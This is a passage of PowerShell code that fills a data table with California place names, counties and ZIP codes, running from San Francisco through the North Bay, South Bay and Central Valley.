Francisco","California","CA","6","94109") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94110") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94111") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94112") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94114") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94115") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94116") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94117") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94118") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94121") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94122") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94123") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94124") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94127") + $null = $Cities.Rows.Add("San francisco","San Mateo","California","CA","6","94128") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94129") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94130") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94131") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94132") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94133") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94134") + $null = $Cities.Rows.Add("Zcta 941hh","San Francisco","California","CA","6","941HH") + $null = $Cities.Rows.Add("Zcta 941xx","San Francisco","California","CA","6","941XX") + $null = $Cities.Rows.Add("Palo alto","Santa Clara","California","CA","6","94301") + $null = $Cities.Rows.Add("East palo alto","San Mateo","California","CA","6","94303") + $null = $Cities.Rows.Add("Palo alto","Santa Clara","California","CA","6","94304") + $null = $Cities.Rows.Add("Stanford","Santa Clara","California","CA","6","94305") + $null = $Cities.Rows.Add("Palo alto","Santa Clara","California","CA","6","94306") + $null = $Cities.Rows.Add("Zcta 943hh","San Mateo","California","CA","6","943HH") + $null = $Cities.Rows.Add("Russian river","San Mateo","California","CA","6","94401") + $null = $Cities.Rows.Add("San mateo","San Mateo","California","CA","6","94402") + $null = $Cities.Rows.Add("San mateo","San Mateo","California","CA","6","94403") + $null = $Cities.Rows.Add("Foster city","San Mateo","California","CA","6","94404") + $null = $Cities.Rows.Add("Zcta 944hh","San Mateo","California","CA","6","944HH") + $null = $Cities.Rows.Add("Coast guard isla","Alameda","California","CA","6","94501") + $null = $Cities.Rows.Add("Alameda","Alameda","California","CA","6","94502") + $null = $Cities.Rows.Add("Black hawk","Contra Costa","California","CA","6","94506") + $null = $Cities.Rows.Add("Alamo","Contra Costa","California","CA","6","94507") + $null = $Cities.Rows.Add("Angwin","Napa","California","CA","6","94508") + $null = $Cities.Rows.Add("Antioch","Contra Costa","California","CA","6","94509") + $null = $Cities.Rows.Add("Benicia","Solano","California","CA","6","94510") + $null = $Cities.Rows.Add("Bethel island","Contra Costa","California","CA","6","94511") + $null = $Cities.Rows.Add("Birds landing","Solano","California","CA","6","94512") + $null = $Cities.Rows.Add("Brentwood","Contra Costa","California","CA","6","94513") + $null = $Cities.Rows.Add("Byron","Contra Costa","California","CA","6","94514") + $null = $Cities.Rows.Add("Calistoga","Napa","California","CA","6","94515") + $null = $Cities.Rows.Add("Clayton","Contra Costa","California","CA","6","94517") + $null = $Cities.Rows.Add("Concord","Contra Costa","California","CA","6","94518") + $null = $Cities.Rows.Add("Concord","Contra Costa","California","CA","6","94519") + $null = $Cities.Rows.Add("Concord","Contra Costa","California","CA","6","94520") + $null = $Cities.Rows.Add("Concord","Contra Costa","California","CA","6","94521") + $null = $Cities.Rows.Add("Pleasant hill","Contra Costa","California","CA","6","94523") + $null = $Cities.Rows.Add("Crockett","Contra Costa","California","CA","6","94525") + $null = $Cities.Rows.Add("Danville","Contra Costa","California","CA","6","94526") + $null = $Cities.Rows.Add("El cerrito","Contra Costa","California","CA","6","94530") + $null = $Cities.Rows.Add("Fairfield","Solano","California","CA","6","94533") + $null = $Cities.Rows.Add("Travis afb","Solano","California","CA","6","94535") + $null = $Cities.Rows.Add("Fremont","Alameda","California","CA","6","94536") + $null = $Cities.Rows.Add("Fremont","Alameda","California","CA","6","94538") + $null = $Cities.Rows.Add("Fremont","Alameda","California","CA","6","94539") + $null = $Cities.Rows.Add("Hayward","Alameda","California","CA","6","94541") + $null = $Cities.Rows.Add("Hayward","Alameda","California","CA","6","94542") + $null = $Cities.Rows.Add("Hayward","Alameda","California","CA","6","94544") + $null = $Cities.Rows.Add("Hayward","Alameda","California","CA","6","94545") + $null = $Cities.Rows.Add("Castro valley","Alameda","California","CA","6","94546") + $null = $Cities.Rows.Add("Hercules","Contra Costa","California","CA","6","94547") + $null = $Cities.Rows.Add("Lafayette","Contra Costa","California","CA","6","94549") + $null = $Cities.Rows.Add("Livermore","Alameda","California","CA","6","94550") + $null = $Cities.Rows.Add("Castro valley","Alameda","California","CA","6","94552") + $null = $Cities.Rows.Add("Pacheco","Contra Costa","California","CA","6","94553") + $null = $Cities.Rows.Add("Fremont","Alameda","California","CA","6","94555") + $null = $Cities.Rows.Add("Moraga","Contra Costa","California","CA","6","94556") + $null = $Cities.Rows.Add("Spanish flat","Napa","California","CA","6","94558") + $null = $Cities.Rows.Add("Napa","Napa","California","CA","6","94559") + $null = $Cities.Rows.Add("Newark","Alameda","California","CA","6","94560") + $null = $Cities.Rows.Add("Oakley","Contra Costa","California","CA","6","94561") + $null = $Cities.Rows.Add("Orinda","Contra Costa","California","CA","6","94563") + $null = $Cities.Rows.Add("Pinole","Contra Costa","California","CA","6","94564") + $null = $Cities.Rows.Add("Shore acres","Contra Costa","California","CA","6","94565") + $null = $Cities.Rows.Add("Pleasanton","Alameda","California","CA","6","94566") + $null = $Cities.Rows.Add("Pope valley","Napa","California","CA","6","94567") + $null = $Cities.Rows.Add("Dublin","Alameda","California","CA","6","94568") + $null = $Cities.Rows.Add("Port costa","Contra Costa","California","CA","6","94569") + $null = $Cities.Rows.Add("Rio vista","Solano","California","CA","6","94571") + $null = $Cities.Rows.Add("Rodeo","Contra Costa","California","CA","6","94572") + $null = $Cities.Rows.Add("Saint helena","Napa","California","CA","6","94574") + $null = $Cities.Rows.Add("Deer park","Napa","California","CA","6","94576") + $null = $Cities.Rows.Add("San leandro","Alameda","California","CA","6","94577") + $null = $Cities.Rows.Add("San leandro","Alameda","California","CA","6","94578") + $null = $Cities.Rows.Add("San leandro","Alameda","California","CA","6","94579") + $null = $Cities.Rows.Add("San lorenzo","Alameda","California","CA","6","94580") + $null = $Cities.Rows.Add("San ramon","Contra Costa","California","CA","6","94583") + $null = $Cities.Rows.Add("Suisun city","Solano","California","CA","6","94585") + $null = $Cities.Rows.Add("Sunol","Alameda","California","CA","6","94586") + $null = $Cities.Rows.Add("Union city","Alameda","California","CA","6","94587") + $null = $Cities.Rows.Add("Pleasanton","Alameda","California","CA","6","94588") + $null = $Cities.Rows.Add("American canyon","Solano","California","CA","6","94589") + $null = $Cities.Rows.Add("Vallejo","Solano","California","CA","6","94590") + $null = $Cities.Rows.Add("Vallejo","Solano","California","CA","6","94591") + $null = $Cities.Rows.Add("Mare island","Solano","California","CA","6","94592") + $null = $Cities.Rows.Add("Walnut creek","Contra Costa","California","CA","6","94595") + $null = $Cities.Rows.Add("Walnut creek","Contra Costa","California","CA","6","94596") + $null = $Cities.Rows.Add("Walnut creek","Contra Costa","California","CA","6","94598") + $null = $Cities.Rows.Add("Yountville","Napa","California","CA","6","94599") + $null = $Cities.Rows.Add("Zcta 945hh","Alameda","California","CA","6","945HH") + $null = $Cities.Rows.Add("Zcta 945xx","Alameda","California","CA","6","945XX") + $null = $Cities.Rows.Add("Oakland","Alameda","California","CA","6","94601") + $null = $Cities.Rows.Add("Oakland","Alameda","California","CA","6","94602") + $null = $Cities.Rows.Add("Oakland","Alameda","California","CA","6","94603") + $null = $Cities.Rows.Add("Oakland","Alameda","California","CA","6","94605") + $null = $Cities.Rows.Add("Oakland","Alameda","California","CA","6","94606") + $null = $Cities.Rows.Add("Oakland","Alameda","California","CA","6","94607") + $null = $Cities.Rows.Add("Emeryville","Alameda","California","CA","6","94608") + $null = $Cities.Rows.Add("Oakland","Alameda","California","CA","6","94609") + $null = $Cities.Rows.Add("Oakland","Alameda","California","CA","6","94610") + $null = $Cities.Rows.Add("Piedmont","Alameda","California","CA","6","94611") + $null = $Cities.Rows.Add("Oakland","Alameda","California","CA","6","94612") + $null = $Cities.Rows.Add("Piedmont","Alameda","California","CA","6","94618") + $null = $Cities.Rows.Add("Oakland","Alameda","California","CA","6","94619") + $null = $Cities.Rows.Add("Oakland","Alameda","California","CA","6","94621") + $null = $Cities.Rows.Add("Zcta 946hh","Alameda","California","CA","6","946HH") + $null = $Cities.Rows.Add("Berkeley","Alameda","California","CA","6","94702") + $null = $Cities.Rows.Add("Berkeley","Alameda","California","CA","6","94703") + $null = $Cities.Rows.Add("Berkeley","Alameda","California","CA","6","94704") + $null = $Cities.Rows.Add("Berkeley","Alameda","California","CA","6","94705") + $null = $Cities.Rows.Add("Albany","Alameda","California","CA","6","94706") + $null = $Cities.Rows.Add("Kensington","Alameda","California","CA","6","94707") + $null = $Cities.Rows.Add("Kensington","Alameda","California","CA","6","94708") + $null = $Cities.Rows.Add("Berkeley","Alameda","California","CA","6","94709") + $null = $Cities.Rows.Add("Berkeley","Alameda","California","CA","6","94710") + $null = $Cities.Rows.Add("Zcta 947hh","Alameda","California","CA","6","947HH") + $null = $Cities.Rows.Add("Richmond","Contra Costa","California","CA","6","94801") + $null = $Cities.Rows.Add("El sobrante","Contra Costa","California","CA","6","94803") + $null = $Cities.Rows.Add("Richmond","Contra Costa","California","CA","6","94804") + $null = $Cities.Rows.Add("Richmond","Contra Costa","California","CA","6","94805") + $null = $Cities.Rows.Add("San pablo","Contra Costa","California","CA","6","94806") + $null = $Cities.Rows.Add("Zcta 948hh","Contra Costa","California","CA","6","948HH") + $null = $Cities.Rows.Add("San rafael","Marin","California","CA","6","94901") + $null = $Cities.Rows.Add("Civic center","Marin","California","CA","6","94903") + $null = $Cities.Rows.Add("Kentfield","Marin","California","CA","6","94904") + $null = $Cities.Rows.Add("Belvedere","Marin","California","CA","6","94920") + $null = $Cities.Rows.Add("Bodega","Sonoma","California","CA","6","94922") + $null = $Cities.Rows.Add("Bodega bay","Sonoma","California","CA","6","94923") + $null = $Cities.Rows.Add("Bolinas","Marin","California","CA","6","94924") + $null = $Cities.Rows.Add("Corte madera","Marin","California","CA","6","94925") + $null = $Cities.Rows.Add("Rohnert park","Sonoma","California","CA","6","94928") + $null = $Cities.Rows.Add("Dillon beach","Marin","California","CA","6","94929") + $null = $Cities.Rows.Add("Fairfax","Marin","California","CA","6","94930") + $null = $Cities.Rows.Add("Cotati","Sonoma","California","CA","6","94931") + $null = $Cities.Rows.Add("Forest knolls","Marin","California","CA","6","94933") + $null = $Cities.Rows.Add("Inverness","Marin","California","CA","6","94937") + $null = $Cities.Rows.Add("Lagunitas","Marin","California","CA","6","94938") + $null = $Cities.Rows.Add("Larkspur","Marin","California","CA","6","94939") + $null = $Cities.Rows.Add("Marshall","Marin","California","CA","6","94940") + $null = $Cities.Rows.Add("Mill valley","Marin","California","CA","6","94941") + $null = $Cities.Rows.Add("Novato","Marin","California","CA","6","94945") + $null = $Cities.Rows.Add("Nicasio","Marin","California","CA","6","94946") + $null = $Cities.Rows.Add("Novato","Marin","California","CA","6","94947") + $null = $Cities.Rows.Add("Novato","Marin","California","CA","6","94949") + $null = $Cities.Rows.Add("Olema","Marin","California","CA","6","94950") + $null = $Cities.Rows.Add("Penngrove","Sonoma","California","CA","6","94951") + $null = $Cities.Rows.Add("Petaluma","Sonoma","California","CA","6","94952") + $null = $Cities.Rows.Add("Petaluma","Sonoma","California","CA","6","94954") + $null = $Cities.Rows.Add("Point reyes stat","Marin","California","CA","6","94956") + $null = $Cities.Rows.Add("San anselmo","Marin","California","CA","6","94960") + $null = $Cities.Rows.Add("San geronimo","Marin","California","CA","6","94963") + $null = $Cities.Rows.Add("San quentin","Marin","California","CA","6","94964") + $null = $Cities.Rows.Add("Sausalito","Marin","California","CA","6","94965") + $null = $Cities.Rows.Add("Stinson beach","Marin","California","CA","6","94970") + $null = $Cities.Rows.Add("Tomales","Marin","California","CA","6","94971") + $null = $Cities.Rows.Add("Valley ford","Sonoma","California","CA","6","94972") + $null = $Cities.Rows.Add("Woodacre","Marin","California","CA","6","94973") + $null = $Cities.Rows.Add("Zcta 949hh","Marin","California","CA","6","949HH") + $null = $Cities.Rows.Add("Zcta 949xx","Marin","California","CA","6","949XX") + $null = $Cities.Rows.Add("Alviso","Santa Clara","California","CA","6","95002") + $null = $Cities.Rows.Add("Aptos","Santa Cruz","California","CA","6","95003") + $null = $Cities.Rows.Add("Aromas","Monterey","California","CA","6","95004") + $null = $Cities.Rows.Add("Ben lomond","Santa Cruz","California","CA","6","95005") + $null = $Cities.Rows.Add("Boulder creek","Santa Cruz","California","CA","6","95006") + $null = $Cities.Rows.Add("Brookdale","Santa Cruz","California","CA","6","95007") + $null = $Cities.Rows.Add("Campbell","Santa Clara","California","CA","6","95008") + $null = $Cities.Rows.Add("Capitola","Santa Cruz","California","CA","6","95010") + $null = $Cities.Rows.Add("Castroville","Monterey","California","CA","6","95012") + $null = $Cities.Rows.Add("Monte vista","Santa Clara","California","CA","6","95014") + $null = $Cities.Rows.Add("Davenport","Santa Cruz","California","CA","6","95017") + $null = $Cities.Rows.Add("Felton","Santa Cruz","California","CA","6","95018") + $null = $Cities.Rows.Add("Freedom","Santa Cruz","California","CA","6","95019") + $null = $Cities.Rows.Add("Gilroy","Santa Clara","California","CA","6","95020") + $null = $Cities.Rows.Add("Hollister","San Benito","California","CA","6","95023") + $null = $Cities.Rows.Add("Monte sereno","Santa Clara","California","CA","6","95030") + $null = $Cities.Rows.Add("Los gatos","Santa Clara","California","CA","6","95032") + $null = $Cities.Rows.Add("Zcta 95033","Santa Cruz","California","CA","6","95033") + $null = $Cities.Rows.Add("Milpitas","Santa Clara","California","CA","6","95035") + $null = $Cities.Rows.Add("Morgan hill","Santa Clara","California","CA","6","95037") + $null = $Cities.Rows.Add("Moss landing","Monterey","California","CA","6","95039") + $null = $Cities.Rows.Add("Mount hermon","Santa Cruz","California","CA","6","95041") + $null = $Cities.Rows.Add("Paicines","San Benito","California","CA","6","95043") + $null = $Cities.Rows.Add("San juan bautist","San Benito","California","CA","6","95045") + $null = $Cities.Rows.Add("San martin","Santa Clara","California","CA","6","95046") + $null = $Cities.Rows.Add("Santa clara","Santa Clara","California","CA","6","95050") + $null = $Cities.Rows.Add("Santa clara","Santa Clara","California","CA","6","95051") + $null = $Cities.Rows.Add("Santa clara","Santa Clara","California","CA","6","95054") + $null = $Cities.Rows.Add("Scotts valley","Santa Cruz","California","CA","6","95060") + $null = $Cities.Rows.Add("Santa cruz","Santa Cruz","California","CA","6","95062") + $null = $Cities.Rows.Add("Santa cruz","Santa Cruz","California","CA","6","95064") + $null = $Cities.Rows.Add("Santa cruz","Santa Cruz","California","CA","6","95065") + $null = $Cities.Rows.Add("Scotts valley","Santa Cruz","California","CA","6","95066") + $null = $Cities.Rows.Add("Saratoga","Santa Clara","California","CA","6","95070") + $null = $Cities.Rows.Add("Soquel","Santa Cruz","California","CA","6","95073") + $null = $Cities.Rows.Add("La selva beach","Santa Cruz","California","CA","6","95076") + $null = $Cities.Rows.Add("Zcta 950hh","Monterey","California","CA","6","950HH") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95110") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95111") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95112") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95113") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95116") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95117") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95118") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95119") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95120") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95121") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95122") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95123") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95124") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95125") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95126") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95127") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95128") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95129") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95130") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95131") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95132") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95133") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95134") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95135") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95136") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95138") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95139") + $null = $Cities.Rows.Add("Mount hamilton","Santa Clara","California","CA","6","95140") + $null = $Cities.Rows.Add("San jose","Santa Clara","California","CA","6","95148") + $null = $Cities.Rows.Add("Zcta 951hh","Santa Clara","California","CA","6","951HH") + $null = $Cities.Rows.Add("Stockton","San Joaquin","California","CA","6","95202") + $null = $Cities.Rows.Add("Stockton","San Joaquin","California","CA","6","95203") + $null = $Cities.Rows.Add("Stockton","San Joaquin","California","CA","6","95204") + $null = $Cities.Rows.Add("Stockton","San Joaquin","California","CA","6","95205") + $null = $Cities.Rows.Add("Stockton","San Joaquin","California","CA","6","95206") + $null = $Cities.Rows.Add("Stockton","San Joaquin","California","CA","6","95207") + $null = $Cities.Rows.Add("Stockton","San Joaquin","California","CA","6","95209") + $null = $Cities.Rows.Add("Stockton","San Joaquin","California","CA","6","95210") + $null = $Cities.Rows.Add("Stockton","San Joaquin","California","CA","6","95212") + $null = $Cities.Rows.Add("Stockton","San Joaquin","California","CA","6","95215") + $null = $Cities.Rows.Add("Stockton","San Joaquin","California","CA","6","95219") + $null = $Cities.Rows.Add("Acampo","San Joaquin","California","CA","6","95220") + $null = $Cities.Rows.Add("Altaville","Calaveras","California","CA","6","95221") + $null = $Cities.Rows.Add("Angels camp","Calaveras","California","CA","6","95222") + $null = $Cities.Rows.Add("Bear valley","Calaveras","California","CA","6","95223") + $null = $Cities.Rows.Add("Avery","Calaveras","California","CA","6","95224") + $null = $Cities.Rows.Add("Burson","Calaveras","California","CA","6","95225") + $null = $Cities.Rows.Add("Campo seco","Calaveras","California","CA","6","95226") + $null = $Cities.Rows.Add("Clements","San Joaquin","California","CA","6","95227") + $null = $Cities.Rows.Add("Copperopolis","Calaveras","California","CA","6","95228") + $null = $Cities.Rows.Add("Farmington","San Joaquin","California","CA","6","95230") + $null = $Cities.Rows.Add("French camp","San Joaquin","California","CA","6","95231") + $null = $Cities.Rows.Add("Glencoe","Calaveras","California","CA","6","95232") + $null = $Cities.Rows.Add("Hathaway pines","Calaveras","California","CA","6","95233") + $null = $Cities.Rows.Add("Linden","San Joaquin","California","CA","6","95236") + $null = $Cities.Rows.Add("Lockeford","San Joaquin","California","CA","6","95237") + $null = $Cities.Rows.Add("Lodi","San Joaquin","California","CA","6","95240") + $null = $Cities.Rows.Add("Lodi","San Joaquin","California","CA","6","95242") + $null = $Cities.Rows.Add("Mokelumne hill","Calaveras","California","CA","6","95245") + $null = $Cities.Rows.Add("Mountain ranch","Calaveras","California","CA","6","95246") + $null = $Cities.Rows.Add("Murphys","Calaveras","California","CA","6","95247") + $null = $Cities.Rows.Add("San andreas","Calaveras","California","CA","6","95249") + $null = $Cities.Rows.Add("Sheepranch","Calaveras","California","CA","6","95250") + $null = $Cities.Rows.Add("Vallecito","Calaveras","California","CA","6","95251") + $null = $Cities.Rows.Add("Valley springs","Calaveras","California","CA","6","95252") + $null = $Cities.Rows.Add("Wallace","Calaveras","California","CA","6","95254") + $null = $Cities.Rows.Add("West point","Calaveras","California","CA","6","95255") + $null = $Cities.Rows.Add("Wilseyville","Calaveras","California","CA","6","95257") + $null = $Cities.Rows.Add("Woodbridge","San Joaquin","California","CA","6","95258") + $null = $Cities.Rows.Add("Zcta 952hh","Calaveras","California","CA","6","952HH") + $null = $Cities.Rows.Add("Zcta 952xx","Calaveras","California","CA","6","952XX") + $null = $Cities.Rows.Add("Atwater","Merced","California","CA","6","95301") + $null = $Cities.Rows.Add("Ballico","Merced","California","CA","6","95303") + $null = $Cities.Rows.Add("Big oak flat","Tuolumne","California","CA","6","95305") + $null = $Cities.Rows.Add("Catheys valley","Mariposa","California","CA","6","95306") + $null = $Cities.Rows.Add("Ceres","Stanislaus","California","CA","6","95307") + $null = $Cities.Rows.Add("Columbia","Tuolumne","California","CA","6","95310") + $null = $Cities.Rows.Add("Coulterville","Mariposa","California","CA","6","95311") + $null = $Cities.Rows.Add("Cressey","Merced","California","CA","6","95312") + $null = $Cities.Rows.Add("Crows landing","Stanislaus","California","CA","6","95313") + $null = $Cities.Rows.Add("Delhi","Merced","California","CA","6","95315") + $null = $Cities.Rows.Add("Denair","Stanislaus","California","CA","6","95316") + $null = $Cities.Rows.Add("El nido","Merced","California","CA","6","95317") + $null = $Cities.Rows.Add("El portal","Mariposa","California","CA","6","95318") + $null = $Cities.Rows.Add("Escalon","San Joaquin","California","CA","6","95320") + $null = $Cities.Rows.Add("Groveland","Tuolumne","California","CA","6","95321") + $null = $Cities.Rows.Add("Gustine","Merced","California","CA","6","95322") + $null = $Cities.Rows.Add("Hickman","Stanislaus","California","CA","6","95323") + $null = $Cities.Rows.Add("Hilmar","Merced","California","CA","6","95324") + $null = $Cities.Rows.Add("Hornitos","Mariposa","California","CA","6","95325") + $null = $Cities.Rows.Add("Hughson","Stanislaus","California","CA","6","95326") + $null = $Cities.Rows.Add("Jamestown","Tuolumne","California","CA","6","95327") + $null = $Cities.Rows.Add("Keyes","Stanislaus","California","CA","6","95328") + $null = $Cities.Rows.Add("La grange","Tuolumne","California","CA","6","95329") + $null = $Cities.Rows.Add("Lathrop","San Joaquin","California","CA","6","95330") + $null = $Cities.Rows.Add("Le grand","Merced","California","CA","6","95333") + $null = $Cities.Rows.Add("Livingston","Merced","California","CA","6","95334") + $null = $Cities.Rows.Add("Cold springs","Tuolumne","California","CA","6","95335") + $null = $Cities.Rows.Add("Manteca","San Joaquin","California","CA","6","95336") + $null = $Cities.Rows.Add("Manteca","San Joaquin","California","CA","6","95337") + $null = $Cities.Rows.Add("Mariposa","Mariposa","California","CA","6","95338") + $null = $Cities.Rows.Add("Red top","Merced","California","CA","6","95340") + $null = $Cities.Rows.Add("Midpines","Mariposa","California","CA","6","95345") + $null = $Cities.Rows.Add("Mi wuk village","Tuolumne","California","CA","6","95346") + $null = $Cities.Rows.Add("Merced","Merced","California","CA","6","95348") + $null = $Cities.Rows.Add("Modesto","Stanislaus","California","CA","6","95350") + $null = $Cities.Rows.Add("Modesto","Stanislaus","California","CA","6","95351") + $null = $Cities.Rows.Add("Modesto","Stanislaus","California","CA","6","95354") + $null = $Cities.Rows.Add("Modesto","Stanislaus","California","CA","6","95355") + $null = $Cities.Rows.Add("Modesto","Stanislaus","California","CA","6","95356") + $null = $Cities.Rows.Add("Modesto","Stanislaus","California","CA","6","95357") + $null = $Cities.Rows.Add("Modesto","Stanislaus","California","CA","6","95358") + $null = $Cities.Rows.Add("Newman","Stanislaus","California","CA","6","95360") + $null = $Cities.Rows.Add("Knights ferry","Stanislaus","California","CA","6","95361") + $null = $Cities.Rows.Add("Patterson","Stanislaus","California","CA","6","95363") + $null = $Cities.Rows.Add("Pinecrest","Tuolumne","California","CA","6","95364") + $null = $Cities.Rows.Add("Planada","Merced","California","CA","6","95365") + $null = $Cities.Rows.Add("Ripon","San Joaquin","California","CA","6","95366") + $null = $Cities.Rows.Add("Riverbank","Stanislaus","California","CA","6","95367") + $null = $Cities.Rows.Add("Salida","Stanislaus","California","CA","6","95368") + $null = $Cities.Rows.Add("Snelling","Merced","California","CA","6","95369") + $null = $Cities.Rows.Add("Sonora","Tuolumne","California","CA","6","95370") + $null = $Cities.Rows.Add("Soulsbyville","Tuolumne","California","CA","6","95372") + $null = $Cities.Rows.Add("Stevinson","Merced","California","CA","6","95374") + $null = $Cities.Rows.Add("Tracy","San Joaquin","California","CA","6","95376") + $null = $Cities.Rows.Add("Tuolumne","Tuolumne","California","CA","6","95379") + $null = $Cities.Rows.Add("Turlock","Stanislaus","California","CA","6","95380") + $null = $Cities.Rows.Add("Turlock","Stanislaus","California","CA","6","95382") + $null = $Cities.Rows.Add("Twain harte","Tuolumne","California","CA","6","95383") + $null = $Cities.Rows.Add("Vernalis","Stanislaus","California","CA","6","95385") + $null = $Cities.Rows.Add("Waterford","Stanislaus","California","CA","6","95386") + $null = $Cities.Rows.Add("Westley","Stanislaus","California","CA","6","95387") + $null = $Cities.Rows.Add("Winton","Merced","California","CA","6","95388") + $null = $Cities.Rows.Add("Yosemite lodge","Mariposa","California","CA","6","95389") + $null = $Cities.Rows.Add("Zcta 953hh","Mariposa","California","CA","6","953HH") + $null = $Cities.Rows.Add("Zcta 953xx","Tuolumne","California","CA","6","953XX") + $null = $Cities.Rows.Add("Santa rosa","Sonoma","California","CA","6","95401") + $null = $Cities.Rows.Add("Santa rosa","Sonoma","California","CA","6","95403") + $null = $Cities.Rows.Add("Santa rosa","Sonoma","California","CA","6","95404") + $null = $Cities.Rows.Add("Santa rosa","Sonoma","California","CA","6","95405") + $null = $Cities.Rows.Add("Santa rosa","Sonoma","California","CA","6","95407") + $null = $Cities.Rows.Add("Santa rosa","Sonoma","California","CA","6","95409") + $null = $Cities.Rows.Add("Albion","Mendocino","California","CA","6","95410") + $null = $Cities.Rows.Add("Annapolis","Sonoma","California","CA","6","95412") + $null = $Cities.Rows.Add("Boonville","Mendocino","California","CA","6","95415") + $null = $Cities.Rows.Add("Branscomb","Mendocino","California","CA","6","95417") + $null = $Cities.Rows.Add("Camp meeker","Sonoma","California","CA","6","95419") + $null = $Cities.Rows.Add("Caspar","Mendocino","California","CA","6","95420") + $null = $Cities.Rows.Add("Cazadero","Sonoma","California","CA","6","95421") + $null = $Cities.Rows.Add("Clearlake","Lake","California","CA","6","95422") + $null = $Cities.Rows.Add("Clearlake oaks","Lake","California","CA","6","95423") + $null = $Cities.Rows.Add("Clearlake park","Lake","California","CA","6","95424") + $null = $Cities.Rows.Add("Cloverdale","Sonoma","California","CA","6","95425") + $null = $Cities.Rows.Add("Loch lomond","Lake","California","CA","6","95426") + $null = $Cities.Rows.Add("Comptche","Mendocino","California","CA","6","95427") + $null = $Cities.Rows.Add("Covelo","Mendocino","California","CA","6","95428") + $null = $Cities.Rows.Add("Dos rios","Mendocino","California","CA","6","95429") + $null = $Cities.Rows.Add("Duncans mills","Sonoma","California","CA","6","95430") + $null = $Cities.Rows.Add("Eldridge","Sonoma","California","CA","6","95431") + $null = $Cities.Rows.Add("Elk","Mendocino","California","CA","6","95432") + $null = $Cities.Rows.Add("Forestville","Sonoma","California","CA","6","95436") + $null = $Cities.Rows.Add("Fort bragg","Mendocino","California","CA","6","95437") + $null = $Cities.Rows.Add("Fulton","Sonoma","California","CA","6","95439") + $null = $Cities.Rows.Add("Geyserville","Sonoma","California","CA","6","95441") + $null = $Cities.Rows.Add("Glen ellen","Sonoma","California","CA","6","95442") + $null = $Cities.Rows.Add("Glenhaven","Lake","California","CA","6","95443") + $null = $Cities.Rows.Add("Graton","Sonoma","California","CA","6","95444") + $null = $Cities.Rows.Add("Gualala","Mendocino","California","CA","6","95445") + $null = $Cities.Rows.Add("Guerneville","Sonoma","California","CA","6","95446") + $null = $Cities.Rows.Add("Healdsburg","Sonoma","California","CA","6","95448") + $null = $Cities.Rows.Add("Hopland","Mendocino","California","CA","6","95449") + $null = $Cities.Rows.Add("Jenner","Sonoma","California","CA","6","95450") + $null = $Cities.Rows.Add("Kelseyville","Lake","California","CA","6","95451") + $null = $Cities.Rows.Add("Kenwood","Sonoma","California","CA","6","95452") + $null = $Cities.Rows.Add("Lakeport","Lake","California","CA","6","95453") + $null = $Cities.Rows.Add("Laytonville","Mendocino","California","CA","6","95454") + $null = $Cities.Rows.Add("Littleriver","Mendocino","California","CA","6","95456") + $null = $Cities.Rows.Add("Lower lake","Lake","California","CA","6","95457") + $null = $Cities.Rows.Add("Lucerne","Lake","California","CA","6","95458") + $null = $Cities.Rows.Add("Manchester","Mendocino","California","CA","6","95459") + $null = $Cities.Rows.Add("Mendocino","Mendocino","California","CA","6","95460") + $null = $Cities.Rows.Add("Middletown","Lake","California","CA","6","95461") + $null = $Cities.Rows.Add("Russian river md","Sonoma","California","CA","6","95462") + $null = $Cities.Rows.Add("Navarro","Mendocino","California","CA","6","95463") + $null = $Cities.Rows.Add("Nice","Lake","California","CA","6","95464") + $null = $Cities.Rows.Add("Occidental","Sonoma","California","CA","6","95465") + $null = $Cities.Rows.Add("Philo","Mendocino","California","CA","6","95466") + $null = $Cities.Rows.Add("Point arena","Mendocino","California","CA","6","95468") + $null = $Cities.Rows.Add("Potter 